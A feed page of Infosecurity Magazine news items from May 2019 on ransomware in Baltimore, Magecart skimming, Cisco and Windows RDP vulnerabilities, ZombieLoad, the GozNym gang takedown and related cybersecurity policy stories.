Cyber Risk News

Baltimore Won't Pay Ransom, Systems Remain Down

Info Security - Fri, 05/17/2019 - 11:54
Baltimore Won't Pay Ransom, Systems Remain Down

The city of Baltimore’s computer systems have remained down since a ransomware attack hit more than a week ago, but the city says it will not pay the ransom despite today’s final 10-day deadline, according to copy of the ransom note obtained by the Baltimore Sun.

The May 7 note warned that if the ransom were not paid within 10 days, the city would no longer be able to have its files returned. In the aftermath of the attack, Baltimore has reverted to using manual systems while it continues efforts to restore the downed system.

From the transportation department to the department of public works and even closing on real estate deals, everything is being held up in what CCN called “the most extensive attacks in history, affecting nearly every important aspect of city life.”

Despite the attackers warning that if the city called the FBI they would cut off contact, federal investigators are assisting in the efforts to free the crippled city. The message from Mayor Jack Young is clear – the city will not pay the ransom, according to WMAR.

As the city struggles to free itself from the constraints of this attack, city officials are looking for ways to be better prepared for future attacks. On May 16, Baltimore city council president Brandon Scott said he was launching a committee on cybersecurity and emergency preparedness.

“This cyber attack against Baltimore City government is a crisis of the utmost urgency,” Scott said, according to The Hill. “That is why I will convene a select committee, co-chaired by Councilman Eric Costello and Councilman Isaac ‘Yitzy’ Schleifer, to examine the City's coordination of cybersecurity efforts, including the Administration's response to the cybersecurity attack and testimony from cybersecurity experts.”

Categories: Cyber Risk News

Hacktivist Attacks Have Fallen 95% Since 2015

Info Security - Fri, 05/17/2019 - 10:45
Hacktivist Attacks Have Fallen 95% Since 2015

The number of publicly disclosed hacktivist attacks has dropped by 95% between 2015 and 2018 thanks to the relative decline of Anonymous, new stats from IBM X-Force have revealed.

The firm claimed that it recorded 35 incidents in 2015, but the number dropped to just five two years later and two by 2018, with none so far this year.

The number attributed to the Anonymous dropped from eight incidents in 2015 to only one tracked in 2018. This is significant as the hacktivist collective accounted for almost 45% of all attacks between 2015 and 2018.

Other groups tend to strike once or twice and then disappear, security analyst Camille Singleton explained in a blog post.

“Starting around 2010, Anonymous became one of the most prolific hacktivist groups in the world, reaching a peak of activity in early- to mid-2016, according to IBM X-Force data. Since then, attacks by Anonymous have declined significantly, possibly due to an attrition of key leadership, differences of opinion and a struggle to find an ideological focus,” she said.

“In addition to differences in viewpoint, several cyber actors have sought to masquerade as Anonymous actors over the past three years, using the moniker in an attempt to legitimize their actions or to tarnish the group’s name by connecting their activities to Anonymous.”

Another potential factor in the decline of hacktivist activity is law enforcement activity. Singleton claimed arrests and legal warnings may be acting as an effective deterrent.

“X-Force IRIS internal tracking of related arrests revealed that law enforcement agencies in the US, UK and Turkey have arrested at least 62 hacktivists since 2011,” she added.

“We suspect the actual number is greater than those publicly announced.”

Three of those arrested received sentences in 2018 and 2019 with jail time of three years or greater. One individual, Martin Gottesfeld, 34, of Somerville, was handed a 10-year sentence after DDoS-ing a Boston hospital in 2014.

Categories: Cyber Risk News

Facebook Bans Israeli Firm For Election Meddling

Info Security - Fri, 05/17/2019 - 09:11
Facebook Bans Israeli Firm For Election Meddling

Facebook has banned an Israeli company from its platform after detecting a massive, coordinated attempt to influence voters in Africa.

In a blog post yesterday, head of cybersecurity policy, Nathaniel Gleicher, revealed his team had been forced to remove 265 Facebook and Instagram accounts, Facebook Pages, Groups and events involved in “coordinated inauthentic behavior” managed by Archimedes Group.

In total, the shadowy Israeli firm ran 65 Facebook accounts, 161 Pages, 23 Groups, 12 events and four Instagram accounts. Its efforts reached a fairly wide audience, with around 2.8 million accounts following one or more of the Pages, while 5,500 accounts joined at least one of the Groups and around 920 people followed one or more of the Instagram accounts.

“The people behind this network used fake accounts to run Pages, disseminate their content and artificially increase engagement. They also represented themselves as locals, including local news organizations, and published allegedly leaked information about politicians,” Gleicher explained.

“The Page administrators and account owners frequently posted about political news, including topics like elections in various countries, candidate views and criticism of political opponents.”

Originating in Israel, the moves targeted users in Nigeria, Senegal, Togo, Angola, Niger and Tunisia, with Facebook also claiming to have found some suspicious activity in Latin America and Southeast Asia.

Around $812,000 was spent on Facebook ads paid for in Brazilian reals, Israeli shekel, and US dollars. They ran from 2012 to 2019, which raises questions about why they weren’t spotted sooner.

“Coordinated inauthentic behavior” is the same moniker used to describe the activity of Russian state-sponsored attempts to interfere with the 2016 US Presidential election, which resulted in the indictment of 13 Russians and three companies from the country.

Archimedes Group, whose tagline is “winning campaigns worldwide,” has now been banned from the social network along with all its subsidiaries and issued with a cease and desist letter.

Categories: Cyber Risk News

Europol and US Police Disrupt $100m Cybercrime Gang

Info Security - Fri, 05/17/2019 - 08:45
Europol and US Police Disrupt $100m Cybercrime Gang

Europol and US authorities are claiming victory after “dismantling” a major international cybercrime gang that used the GozNym banking trojan in an attempt to steal $100m from businesses.

A federal indictment was unsealed yesterday charging 10 members of the group with conspiracy to commit computer fraud, conspiracy to commit wire fraud and bank fraud, and conspiracy to commit money laundering. An eleventh has already been charged in a previous indictment.

Five of the gang are based in Russia and will therefore probably escape justice. However, the leader of the group, Alexander Konovolov — aka “NoNe,” and “none_1” — 35, of Tbilisi, Georgia, is being prosecuted in his home country, along with his alleged right-hand man Marat Kazandjian, aka “phant0m,” 31, of Kazakhstan and Tbilisi.

Another man, Eduard Malanici, aka “JekaProf,” is being prosecuted in his native Moldova for charges relating to alleged provision of crypting services, while Gennady Kapkanov — aka “Hennadiy Kapkanov,” “flux,” “ffhost,” “firestarter,” and “User 41” — 36, of Poltava, Ukraine, is being prosecuted in the eastern European nation for charges of bulletproof hosting for the group via the infamous Avalanche network.

He was arrested in 2018 after shooting an assault rifle at Ukrainian police searching his flat, while another man, Krasimir Nikolov, of Varna, Bulgari, was extradited to the US in 2016 on charges of being the group’s account takeover specialist.

Each man had a specific role and was apparently recruited from Russian-speaking dark web forums. The GozNym malware was distributed to around 41,000 victim computers via phishing emails. Once they captured the victim’s online banking credentials, accounts were accessed and funds transferred to third-party accounts under the group’s control.

“International law enforcement has recognized that the only way to truly disrupt and defeat transnational, anonymized networks is to do so in partnership,” said Pennsylvania US attorney Scott Brady. 

“The collaborative and simultaneous prosecution of the members of the GozNym criminal conspiracy in four countries represents a paradigm shift in how we investigate and prosecute cybercrime.”

Roy Rashti, cybersecurity expert at BitDam, argued that the dismantling of this network is just a drop in the ocean, but a welcome move nonetheless.

“The ‘Goz’ in GozNym stands for the notorious Gozi banker malware which, although not new, was very successfully co-opted and iterated by hackers,” he added.

“This provides yet another example of how adversaries tweak known attacks to bypass legacy security solutions to reach and exploit the end user. This strategy allows cybercrime groups to operate like any successful business — with efficiency, dynamism and always staying one step ahead. That is of course, until they get caught.”

Categories: Cyber Risk News

Critical Vulnerabilities in Cisco Products

Info Security - Thu, 05/16/2019 - 18:07
Critical Vulnerabilities in Cisco Products

A high-risk vulnerability in Cisco's secure boot process was disclosed earlier this week by Cisco and Red Balloon Security and is believed to have affected an estimate 100 or more devices.

The vulnerability (CVE-2019-1649) is “in the logic that handles access control to one of the hardware components in Cisco's proprietary Secure Boot implementation could allow an authenticated, local attacker to write a modified firmware image to the component. This vulnerability affects multiple Cisco products that support hardware-based Secure Boot functionality,” Cisco reported.

Additionally, Cisco reported that another vulnerability (CVE-2019-1862) in the “web-based user interface (Web UI) of Cisco IOS XE Software could allow an authenticated, remote attacker to execute commands on the underlying Linux shell of an affected device with root privileges.”

The vulnerability, called Thrangrycat, affects millions of Cisco devices (including routers, switches and firewalls) and exposes a large number of corporate and government networks to remote attacks, according to Red Balloon Security.

Cisco also noted in regard to the Secure Boot vulnerability that it will release software patches, but there are no workarounds to address the issue.

An attacker could exploit this to gain full and permanent access to those networks. It also can't be fixed with a software patch, so it will be difficult for affected organizations to fully mitigate the threats this poses, according to Red Balloon Security.

“This is a significant security weakness which potentially exposes a large number of corporate, government and even military networks to remote attacks,” said Dr. Ang Cui, founder and chief scientist of Red Balloon Security, in a press release. 

“We're talking about tens of millions of devices potentially affected by this vulnerability, many of them located inside of sensitive networks. These Cisco products form the backbone of secure communications for these organizations, and yet we can exploit them to permanently own their networks. Fixing this problem isn't easy, because to truly remediate it requires a physical replacement of the chip at the heart of the Trust Anchor system. A firmware patch will help to offset the risks, but it won't completely eliminate them. This is the real danger, and it will be difficult for companies, financial institutions and government agencies to properly address this problem.”

Categories: Cyber Risk News

Forbes Site Up, Then Down Again after Magecart Attack

Info Security - Thu, 05/16/2019 - 17:12
Forbes Site Up, Then Down Again after Magecart Attack

Forbes was reportedly back online but went down again at 3:30 pm UTC after reports that the site was hit with the Magecart card-skimming malware, according to security researcher Troy Mursch.

Mursch tweeted on May 15 that Forbes had been infected with the Magecart malware, adding that customers who made a purchase while the site was compromised likely had their credit card information stolen. In a later tweet, Mursch confirmed that the malware had been removed.

Hackers apparently injected obfuscated JavaScript, which could be linked to the ongoing supply chain attacks that have been reported by Willem DeGroot this week. Forbes is, according to The Register, a customer of Picreel, which has been the victim of a supply chain attack.

Mursch reportedly sent several emails in an attempt to alert Forbes to the Magecart infection and reported the problem to the domain owner, yet he has not heard back from Forbes, The Register said.

“Threat actors have used several methods of attacking websites. There’s a trend, though, towards attacking the payment page supply chain, which offers the most bang for their buck because third parties offer direct links to a larger number of customers, including high-profile companies that would otherwise be harder to compromise,” said Mike Bittner, associate director of digital security and operations, The Media Trust.

“These pages are soft targets for several reasons. They run third-party code supplied by vendors who operate on very tight – sometimes negative – profit margins and must scrutinize every expense. Such businesses too often fail to give security and privacy the priority they require. Second, third-party code executes outside the website owner’s infrastructure, making them hard, if not impossible, to monitor without the right tools and expertise. Third, in many publications, these payment pages do not fall under the website operators’ rev ops teams, who make pivotal decisions on security and privacy.

“The bottom line here is that publishers should carefully vet ALL their third parties for security and privacy and conduct frequent audits to ensure they have adequate security measures in place. Because every one of their third parties is likely not only vulnerable but under attack.”

Categories: Cyber Risk News

Supply Chain Attack Hits Best of the Web Website

Info Security - Thu, 05/16/2019 - 16:48
Supply Chain Attack Hits Best of the Web Website

The website Best of the Web, whose purpose is to assure site visitors that their user data is safe and that the websites it lists value visitor privacy, has been hacked, according to security researcher Willem de Groot. The site is a directory of websites that receive a trust seal so visitors will know they are real businesses, but the site itself was injected with an information stealing malware.  

On May 13, the researcher tweeted that the Best of the Web seal was injected with two keyloggers and that more than 100 websites were still linked to the compromised seal.

Attackers reportedly injected obfuscated JavaScript code, and according to his latest tweet, DeGroot confirmed that the attackers used open S3 buckets to inject form jackers. DeGroot has identified several supply chain attacks that have impacted multiple companies (complete list at PublicWWW), including Picreel, historydaily.org, groupon.com.ar, groupon.cl, trome.pe and tributes.com

Best of the Web confirmed that it had been compromised, stating, "Earlier today, we were notified that the script we use to display trust seals that we host on Amazon’s content delivery network (CDN) was compromised. We took immediate action to remedy the situation and are in the process of informing those who were affected. We will be conducting a full security audit of our hosted accounts to ensure that this does not happen again.”

“In this latest supply chain attack, hackers went after the weakest link with the most impact to affect the greatest number of websites,” said Matan Or-El, CEO of Panorays. “It’s certainly ironic to hack a trust seal, and the message is clear: you cannot trust anything. This cyber incident underscores the importance of assessing the security of all third parties and continuously monitoring them, since their status can quickly change, as was the case here where the code was maliciously modified.”

Categories: Cyber Risk News

UK Fraud Complaints Surge Over 40%

Info Security - Thu, 05/16/2019 - 10:12
UK Fraud Complaints Surge Over 40%

UK consumers’ complaints over banking fraud have surged by over 40% to hit an all-time high in the 2018-19 financial year, driven by online scams, according to official figures.

The Financial Ombudsman Service (FOS), which settles disputes between customers and their banks, said it received 12,195 complaints over the period, a 43% increase on the 6952 in the previous 12 months.

“One of the fastest-growing types of fraud is authorized push payment (APP) fraud — where people unwittingly act on fraudsters’ instructions and carry out the transactions themselves,” the FOS said.

“We’ve been taking a close look at the APP complaints we’ve received. And we’ve reminded banks of their existing obligations to ensure that victims of fraud are treated fairly, as we’ve found that they haven’t always got this right.”

A new voluntary code of practice will come into force at the end of May designed to help victims of APP fraud get their money back more easily. Up until now, banks have been reluctant to pay out in such cases and often blame the individual.

Some £354m was lost to APP fraud in the UK last year, up 50% from 2017. Although some lenders, like TSB, have sought to differentiate by promising to refund victims, the industry in general has been slow to react to the threat.

“Bank transfer fraud is spiraling out of control, with people losing life-changing sums every day and then facing a grueling battle to get their money back from the very banks that should be preventing them from falling victim in the first place,” argued Gareth Shaw, head of money at consumer rights group Which.

“Banks have just two weeks to sign up to the new industry code [of practice], which will only be deemed a success if they finally halt this worsening crime by offering better protection to their customers, while swiftly and fairly reimbursing all those who lose money through no fault of their own.’

Another new proposal comes from the Payment Systems Regulator (PSR) and will introduce “confirmation of payee checks” to warn users when the name they enter into online bank transfers doesn’t match the sort code and account number on record.

However, a July 1, 2019 deadline is now set to be pushed back to 2020.

Categories: Cyber Risk News

Rights Group Win Allows Courts to Scrutinize Spy Agencies

Info Security - Thu, 05/16/2019 - 09:22
Rights Group Win Allows Courts to Scrutinize Spy Agencies

Privacy campaigners are hailing a major legal victory after the Supreme Court ruled that the intelligence services should not be exempt from oversight by ordinary UK courts.

Privacy International (PI) has fought a five-year case with the government, following the Edward Snowden disclosures that UK spies used bulk hacking techniques which may have impacted millions.

The case was initially heard in the secret Investigatory Powers Tribunal (IPT) — which rules specifically on cases involving the intelligence services. It agreed in principle with the government that it would be acceptable to use a single, broad warrant to hack every mobile phone in a UK city.

PI tried to fight that decision in the High Court, with the government arguing that IPT rulings couldn’t be subject to regular judicial review. Both the High Court and then the Court of Appeal agreed with the government, but the rights group was in 2017 allowed to take its case all the way to the Supreme Court.

Its decision yesterday effectively means that IPT decisions can be subject to judicial review in the High Court, which means mistakes made by the tribunal can now be corrected by the courts.

PI general counsel, Caroline Wilson Palow, argued the ruling was a “historic victory for the rule of law.”

“Countries around the world are currently grappling with serious questions regarding what power should reside in each branch of government. Today's ruling is a welcome precedent for all of those countries, striking a reasonable balance between executive, legislative and judicial power,” she added.

“Today's ruling paves the way for Privacy International's challenge to the UK government's use of bulk computer hacking warrants. Our challenge has been delayed for years by the government's persistent attempt to protect the IPT’s decisions from scrutiny. We are heartened that our case will now go forward."

Categories: Cyber Risk News

Trump Declares National Emergency to Contain China Threat

Info Security - Thu, 05/16/2019 - 08:31
Trump Declares National Emergency to Contain China Threat

The Trump administration has turned up the heat on China after declaring a national emergency designed ostensibly to protect US networks from “foreign adversaries.”

Although China and Huawei are not named in the declaration, it is widely seen as a move designed to target the latter. It will effectively extend the federal ban on Huawei equipment to all US firms.

Separately, and perhaps even more importantly, the Shenzhen giant and 70 affiliates have been placed on an “entity list.”

This means that it will not be able to source key components from US providers without Commerce Department approval.

Depending on whether this approval is granted or not, this could put the firm in a serious position similar to ZTE's when US firms were prohibited from selling to it after the Chinese telecoms firms broke Iran sanctions. At that time, only an intervention from Trump saved the company.

US officials told Reuters the decision would make it nearly impossible for Huawei to sell some of its products as they rely on US-made kit.

A White House statement revealed that the Executive Order invoked the International Emergency Economic Powers Act, which allows a President to interfere with commerce in order to protect national security. The Commerce Department now has 150 days to draw up an enforcement plan.

“The President has made it clear that this administration will do what it takes to keep America safe and prosperous, and to protect America from foreign adversaries who are actively and increasingly creating and exploiting vulnerabilities in information and communications technology infrastructure and services in the United States,” noted a message from the White House press secretary.

“This Executive Order declares a national emergency with respect to the threats against information and communications technology and services in the United States and delegates authority to the Secretary of Commerce to prohibit transactions posing an unacceptable risk to the national security of the United States or the security and safety of United States persons.”

Unsurprisingly, Huawei and China have hit back, claiming the order will not make the US safer but only result in delayed 5G roll-outs which will harm consumers.

Washington has so far failed to produce any hard evidence to suggest that Huawei is a national security risk, although Chinese law demands that any Middle Kingdom firm co-operate with the authorities if required.

However, UK intelligence services have raised serious concerns around the quality of the telecoms kit maker’s “security and engineering processes.”

Still, Prime Minister Theresa May recently overruled several Cabinet members in approving the firm to supply non-core 5G kit.

Steve Patton, director and cybersecurity Specialist at Telesoft Technologies, argued that a “measured approach” is needed to combat telecoms cyber risk.

“Even with a network built from other, non-Chinese vendors, there should be additional protection and — more importantly — monitoring of critical infrastructure to scan for threats,” he said.

“After all, given we live in a truly technological age, where cyber-threats are increasingly advanced, it's impossible to guarantee that any one vendor is fully immune from attacks.”

Categories: Cyber Risk News

Companies' Stock Value Dropped 7.5% after Data Breaches

Info Security - Wed, 05/15/2019 - 17:44
Companies' Stock Value Dropped 7.5% after Data Breaches

After analyzing the top three breaches from the past three years, Bitglass found that in the aftermath of a data breach, a decrease in stock price was a notable repercussion identifiable for publicly traded companies.

The report, Kings of the Monster Breaches, identified the extensive damage done by improper security by looking specifically at the Marriott breach of 2018, the Equifax breach of 2017 and the Yahoo! breach of 2016. These top three breaches had a widespread impact on individuals, with a reported mean number of 257 million individuals directly affected by each breach.  

Research also showed that these breaches have cost an average of $347 million in legal fees, penalties and remediation costs. “Marriott uncovered the breach while seeking GDPR compliance; the company is now being fined $912 million under the regulation,” the report said.

The top breaches resulted from outside attackers employing phishing campaigns, using malware or exploiting technical vulnerabilities, which was the case for Equifax. “Through this vulnerability, hackers were able to access sensitive data such as Social Security numbers, credit card numbers, full names, dates of birth, and home addresses. It took roughly two months for the breach to be discovered. The company’s CSO, Susan Mauldin, and CIO, David Webb, retired immediately after the security lapse had been announced,” according to the report.

Publicly traded companies suffered an average drop of 7.5% in their stock values and a mean market cap loss of $5.4 billion per company, and it reportedly took 46 days, on average, for those stock prices to return to their pre-breach levels. To date, the stock price of Equifax has not yet recovered.

"The largest breaches over the past three years have caused massive and irreparable damage to large enterprises and their stakeholders around the globe," said Rich Campagna, chief marketing officer of Bitglass.

"This should serve as a stark warning to organizations everywhere. If massive companies with seemingly endless resources are falling victim to external attacks, then companies of all sizes must remain vigilant in their cybersecurity efforts. It is only by taking a proactive approach to security that breaches can be prevented and data can truly be kept safe.”

Categories: Cyber Risk News

IT Decision-Makers Willing to Share Threat Intel

Info Security - Wed, 05/15/2019 - 17:07
IT Decision-Makers Willing to Share Threat Intel

The sharing mentality is starting to take hold across the cybersecurity industry, with the vast majority of security decision-makers confessing that they would be willing to share threat intelligence, according to a new publication by IronNet.

The report, Collective Offense Calls for Collective Defense: A Reality Check for Cybersecurity Decision Makers, surveyed 200 U.S. security IT decision-makers. Of those, 94% stated that their organization would be willing to increase the level of threat sharing with their industry peers if it demonstrably improved their ability to detect threats.

Additionally, 92% of respondents said they would even increase threat sharing with the government if it meant the government could use political, economic, cyber, or other national-level capabilities to deter cyber-attacks, the report said.

As nation-state attacks become more prevalent, threat actors are collaborating on techniques to make their attacks more profitable, leaving individual security teams to defend themselves against a collective offense.

The report also found that organizations are suffering an average of one cybersecurity incident every three months, with 80% saying the incident was so severe that it required C-level and/or board meetings afterward.

“Despite most IT decision makers’ reported confidence that their cybersecurity capabilities are advanced and in better shape than others in their industry (55%), they nonetheless experienced an average of four attacks on their organization over a 12 month period, with 20% of respondents being hit six or more times,” the report said.

“Organizations are increasingly grasping the need for better threat information sharing. Half of decision makers surveyed noted that their threat sharing tool could be improved upon, and 46% identified a need for enhanced sharing of cyber attacker tools, tactics, and procedures (TTP) and faster sharing of raw intelligence at network speed. The lack of such protections magnified the damage from recent attacks like Hydro Norsk, NotPetya, and others that quickly spread from company to company and could have been mitigated by better collective defense.”

Categories: Cyber Risk News

Boost Mobile Alerts Customers of Security Incident

Info Security - Wed, 05/15/2019 - 16:59
Boost Mobile Alerts Customers of Security Incident

Customers of Boost Mobile are being urged to change their passwords and PINs after the company announced that it detected unauthorized activity from a third party.

“On March 14, 2019, Boost.com experienced unauthorized online account activity in which an unauthorized person accessed your account through your Boost phone number and Boost.com PIN code,” the notice of a security incident said.

“The Boost Mobile fraud team discovered the incident and was able to implement a permanent solution to prevent similar unauthorized account activity.”

Attackers using compromised credentials accounted for 29% of data breaches, according to Verizon’s 2019 Data Breach Investigation Report. The unauthorized access at Boost Mobile is what Byron Rashed, VP of marketing, Centripetal, called a classic example of a series of events that enables threat actors to infiltrate networks and exfiltrate customer data and/or personally identifiable information.

Usually, a compromised credential from a third-party breach starts the process. The threat actor can use various unsophisticated/sophisticated techniques to either obtain a password or crack a hashed password. Once an account is compromised, the threat actor can find a way into the network and access various databases,” Rashed said.

“The credentials can be a typical customer/user and/or an admin that has network access. Threat actors can leverage various tools and social media to find out information on users/admins and obtain a password (such as the names of spouses, children, pets, etc.) and try different combinations using automated tools.”

In addition to urging customers to follow the security strategies set forth by the Federal Trade Commission, Boost Mobile sent temporary PIN code via text message, reminding customers to avoid combinations such as "1234" or "0000."

“The best defense against attackers using stolen credentials is to use a password that is unique with various characters and one that does not contain anything that is specific to the individual as noted,” Rashed added.

“On the network defense side, shielding against known IPs, domains, and other sources is critical. Most breaches come from known sources. To shield these sources from the onset greatly increases the organization’s security posture.”

Categories: Cyber Risk News

Hospitals Failing on Cybersecurity Hygiene

Info Security - Wed, 05/15/2019 - 10:55
Hospitals Failing on Cybersecurity Hygiene

Healthcare organizations (HCOs) are increasingly at risk from legacy operating systems, device complexity and the use of commonly exploited protocols, according to a new study from Forescout.

The security vendor analyzed 75 global healthcare deployments running over 1.5 million devices across 10,000 virtual local area networks (VLANs).

It found that although less than 1% were running unsupported operating systems, 71% of Windows devices were on Windows 7, Windows 2008 or Windows Mobile, which will be end-of-lifed in January 2020 — less than a year away.

These HCOs are further exposing themselves to threats by using high-risk services like SMB, which was exploited in the infamous WannaCry attacks, as well as RDP, FTP and others. Some 85% of Windows devices had SMB turned on, while over a third (35%) were running RDP, which is commonly used in fileless attacks.

The sheer range of medical devices in use also presents greater cyber-risks, especially as many aren’t architected with security in mind, the report claimed.

A third (34%) of organizations’ medical VLANs were found to support more than 100 distinct device vendors. Even more are likely to exist on other networks.

Patching is often problematic due to the criticality of these devices and the fact that, in some cases, doing so invalidates the product’s warranty.

Even worse, in many cases, vendors are responsible for patching themselves, and sometimes devices are connected to the network without the oversight of IT, claimed the report.

Forescout argued that VLANs could help HCOs mitigate risk by segmenting their networks. However, in half (49%) of the deployments studied, medical devices were connected to 10 VLANs or fewer, suggesting insufficient investment in this strategy.

“Our findings reveal that healthcare organizations have some of the most diverse and complex IT environments, which are compounded due to compliance risks,” argued Elisa Costante, head of OT and industrial technology innovation at Forescout.

“Every time a patch is applied, there is concern around voiding a warranty or impacting patient safety. These organizations are dealing with life-saving devices and extremely sensitive environments.”

Although there has been an explosion in OT (8%) and IoT (39%) devices in recent years, the biggest potential attack surface on medical VLANs came from regular IT devices (53%), the report claimed.

Categories: Cyber Risk News

Hospitals Failing on Cybersecurity Hygiene

Info Security - Wed, 05/15/2019 - 10:55
Hospitals Failing on Cybersecurity Hygiene

Healthcare organizations (HCOs) are increasingly at risk from legacy operating systems, device complexity and the use of commonly exploited protocols, according to a new study from Forescout.

The security vendor analyzed 75 healthcare deployments running over 1.5 million devices across 10,000 virtual local area networks (VLANs).

It found that although less than 1% were running unsupported operating systems, 71% of Windows devices were on Windows 7, Windows 2008 or Windows Mobile, which will be end-of-lifed in January 2020 — less than a year away.

These HCOs are further exposing themselves to threats by using high-risk services like SMB, which was exploited in the infamous WannaCry attacks, as well as RDP, FTP and others. Some 85% of Windows devices had SMB turned on, while over a third (35%) were running RDP, which is commonly used in fileless attacks.

The sheer range of medical devices in use also presents greater cyber-risks, especially as many aren’t architected with security in mind, the report claimed.

A third (34%) of organizations’ medical VLANs were found to support more than 100 distinct device vendors. Even more are likely to exist on other networks.

Patching is often problematic due to the criticality of these devices and the fact that, in some cases, doing so invalidates the product’s warranty.

Even worse, in many cases, vendors are responsible for patching themselves, and sometimes devices are connected to the network without the oversight of IT, claimed the report.

Forescout argued that VLANs could help HCOs mitigate risk by segmenting their networks. However, in half (49%) of the deployments studied, medical devices were connected to 10 VLANs or fewer, suggesting insufficient investment in this strategy.

“Our findings reveal that healthcare organizations have some of the most diverse and complex IT environments, which are compounded due to compliance risks,” argued Elisa Costante, head of OT and industrial technology innovation at Forescout.

“Every time a patch is applied, there is concern around voiding a warranty or impacting patient safety. These organizations are dealing with life-saving devices and extremely sensitive environments.”

Although there has been an explosion in OT (8%) and IoT (39%) devices in recent years, the biggest potential attack surface on medical VLANs came from regular IT devices (53%), the report claimed.

Categories: Cyber Risk News

“Wormable” Bug Could Enable Another WannaCry

Info Security - Wed, 05/15/2019 - 09:31
“Wormable” Bug Could Enable Another WannaCry

Microsoft released fixes for 79 unique vulnerabilities yesterday, including 22 critical bugs — one of which could be used to spread malware around the globe.

Microsoft detailed the potential impact of CVE-2019-0708 in a separate blog post on Tuesday.

This is a flaw in Remote Desktop Services (RDS) which could allow an attacker to remotely execute arbitrary code on a target system after connecting using RDP.

Even worse, according to Microsoft, the bug is “wormable,” meaning that “any future malware that exploits this vulnerability could propagate from vulnerable computer to vulnerable computer in a similar way as the WannaCry malware spread across the globe in 2017.”

“While we have observed no exploitation of this vulnerability, it is highly likely that malicious actors will write an exploit for this vulnerability and incorporate it into their malware,” Microsoft warned.

Although the bug affects older operating systems — Windows 7, Windows Server 2008 R2 and Windows Server 2008 — it should be patched ASAP. Microsoft is even making fixes available for out-of-support versions XP and Windows 2003, such is the potential threat.

“CVE-2019-0708 should be the highest priority patching because, in addition to the wormable capabilities in this exploit, many modern ransomware variants, such as Dharma, Robbinhood, and CrySIS, often use vulnerable RDP servers to gain access to victim networks,” argued Recorded Future senior solutions architect, Allan Liska. “This vulnerability will make that process even easier.”

Elsewhere, IT admins should also fix a zero-day flaw (CVE-2019-0863), which is being exploited in the wild and has also been publicly disclosed, meaning other hackers could use it in their own attacks. It’s an elevation-of-privilege vulnerability in the way Windows Error Reporting handles files, which allows an attacker to gain kernel mode access to a victim system.

In addition, a publicly disclosed vulnerability in Skype for Android (CVE-2019-0932) could enable an attacker to snoop on conversations without a victim’s knowledge.

Categories: Cyber Risk News

ZombieLoad Bugs Expose Intel Machines to Data Theft

Info Security - Wed, 05/15/2019 - 09:04
ZombieLoad Bugs Expose Intel Machines to Data Theft

Researchers have discovered a major new set of vulnerabilities in nearly all post-2011 Intel chips which could enable side-channel attacks targeting sensitive information.

ZombieLoad is reminiscent of Spectre and Meltdown bugs reported in January 2018 in that it affects not only desktop and laptop machines but also cloud servers. Like them, it exploits the speculative execution process to enable attackers to steal data from the processor.

Technically known as a “data sampling attack,” it’s far from trivial to launch, but should be addressed immediately by admins as it could theoretically allow attackers to monitor a victim’s browsing in real-time, or steal sensitive credentials and data.

“While programs normally only see their own data, a malicious program can exploit the fill buffers to get hold of secrets currently processed by other running programs,” the research paper claimed. “These secrets can be user-level secrets, such as browser history, website content, user keys, and passwords, or system-level secrets, such as disk encryption keys.”

ZombieLoad (CVE-2018-12130) is the most dangerous vulnerability, although the researchers also found three others: CVE-2018-12126, CVE-2018-12127 and CVE-2019-11091. Intel calls these Microarchitectural Data Sampling (MDS) flaws.

“All of them have in common that they trigger a faulty read, and extract data used by transiently executed operations via a side-channel,” said the researchers in an accompanying blog post.

The good news is that Intel has already addressed MDS issues post-Spectre/Meltdown, so its newer chips (8th and 9th Generation Intel Core processors and 2nd Generation Intel Xeon Scalable processor family) aren’t affected.

It has also released microcode updates to address the vulnerabilities, although these could apparently have a 9% performance hit on cloud machines and around 3% on desktops and laptops. Apple, Google, and Microsoft have already released patches to fix ZombieLoad.

Categories: Cyber Risk News

San Francisco Votes to Ban Facial Recognition

Info Security - Tue, 05/14/2019 - 18:42
San Francisco Votes to Ban Facial Recognition

Lawmakers in San Francisco will vote today on legislation that would ban the use of facial recognition technology among city departments, according to NPR.

If approved, the law would make San Francisco the first city to ban the technologies use, a ban that would extend to police body cameras. “Governments have used the technology for several years, and the software can assist with efforts to find missing children, for example, or prevent driver's license fraud,” NPR reported.

That the technology is so widely used is evidence of what happens when the pace of adoption moves too swiftly. “It’s good to see legislators and others taking technological innovations seriously – especially in terms of this one-to-many use case where facial recognition might be used to pick a face out of a crowd,” said Sam Bakken, senior product marketing manager at OneSpan.

“It’s important to remember though that one-to-one use cases such as that facilitated by Apple Face ID and other technology whereby a user willingly enrolls in the system to allow them to unlock their phone or log into other accounts using their face makes it easy and convenient for consumers to add an additional layer of security to their mobile devices and accounts.”

The proposed legislation is intended to address those instances where individuals are not consenting to have their images included in a database, but not all experts agree that the move to ban the technology is a step in the right direction.

“This is backwards thinking when it comes to public safety and an equally illogical argument could be made against using fingerprints and DNA evidence, which are also left behind without intent or permission but are instrumental in providing leads that solve countless crimes and bring violent criminals to justice. We have a constitutional presumption of innocence that protects us. If facial recognition or fingerprint matching or DNA testing provides clues to law enforcement agencies, they should not be barred from following up on them," John Gunn, CMO, OneSpan.

Categories: Cyber Risk News

Speculators Look to ID AVs Hacked by Russia

Info Security - Tue, 05/14/2019 - 18:15
Speculators Look to ID AVs Hacked by Russia

Last week Infosecurity Magazine reported on threat intelligence published by Advanced Intelligence (AdvIntel) claiming that three US antivirus companies had been hacked by a top-tier Russian hacking collective.

While the original research did not identify the impacted companies, both Gizmodo and Bleeping Computer have reported that McAfee, Symantec and Trend Micro are the three companies in question.

Though it does try to adhere to the general rule of not discussing victim entities, an AdvIntel spokesperson said in an email, “Given the latest independent corroboration and publication, we can confirm that Trend Micro and McAfee were two of the companies that were claimed to be breached by the actor group with their internal access and data for sale.”

Trend Micro has confirmed that an unauthorized third party accessed a single testing lab network. “We have an active investigation underway related to recent claims, and while it is not complete, we want to transparently share what we have learned. Working closely with law enforcement, our global threat research and forensic teams are leading this investigation,” a Trend Micro spokesperson wrote in an email.

“Some low-risk debugging related information was obtained. We are nearing the end of our investigation and at this time we have seen no indication that any customer data nor source code were accessed or exfiltrated. Immediate action was taken to quarantine the lab and additionally secure all corresponding environments. Due to the active nature of the investigation, we are not in a position to share any additional information, but we will provide an update when additional insights become available and can be disclosed.”

A McAfee spokesperson wrote, “McAfee has been conducting a thorough investigation into these claims. To date, we’ve found no indication that McAfee products, services or networks have been impacted by the campaign described.”

AdvIntel said that it had reached out to all of the purported victims, as well as the law enforcement, regarding Fxmsp well before its initial blog was released. Though the company did not comment on whether Symantec was one of the breached companies, there has been speculation that Symantec is the third victim.

